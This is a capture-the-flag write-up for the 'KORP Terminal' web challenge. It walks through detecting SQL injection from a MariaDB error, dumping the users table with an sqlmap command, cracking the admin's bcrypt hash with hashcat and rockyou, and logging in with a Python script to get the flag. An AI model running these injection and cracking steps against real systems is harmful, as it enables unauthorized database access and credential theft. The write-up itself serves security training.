Tags: ssti web 

Rating:

# KORP Terminal

Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.

## Writeup

In the site if we try to send an **username** equal to **'**, this error code will appear:

```json
{"error":{"message":["1064","1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1","42000"],"type":"ProgrammingError"}}
```

So we can use **SQL injection** on **MariaDB** with **SQLmap**:

```bash
sqlmap -u "http://83.136.252.82:33660/" --forms --dump --ignore-code 401
```

This is the output:

```
Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password | username |
+----+--------------------------------------------------------------+----------+
| 1 | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin |
+----+--------------------------------------------------------------+----------+
```

Now we can try to crack the password:

```bash
hashcat -m 3200 '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.' /usr/share/wordlists/rockyou.txt
```

With this output:

```
$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123
```

Now we can extract the flag:

```python
#!/usr/bin/python3
import requests

ip = "83.136.252.82"
port = 33660

url = f"http://{ip}:{port}/"

username = "admin"
password = "password123"

data = {
'username' : username,
'password' : password
}

req = requests.post(url, data=data)
print(req.text)
```

This is the flag:

```
HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}
```

Original writeup (https://github.com/MicheleMosca/CTF/blob/main/Cyber%20Apocalypse%202024/web/KORP%20Terminal/README.md).